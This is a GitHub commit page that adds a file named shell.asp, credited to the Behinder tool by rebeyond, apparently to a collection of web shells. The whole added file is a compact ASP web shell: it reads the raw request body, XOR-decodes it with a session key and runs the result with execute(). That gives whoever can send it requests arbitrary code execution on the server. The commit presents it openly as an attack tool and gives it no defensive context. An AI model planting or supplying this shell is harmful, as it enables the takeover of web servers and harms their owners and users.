add shell.asp with Behinder

from : https://github.com/rebeyond/Behinder
author: rebeyond  👍
This commit is contained in:
tennc 2020-08-18 21:11:13 +08:00 committed by GitHub
parent 088645f1c2
commit 05e2ea5d89
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

11
Behinder/shell.asp Normal file
View file

@ -0,0 +1,11 @@
<%
Response.CharSet = "UTF-8"
Session("k")=k
k=Session("k")
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>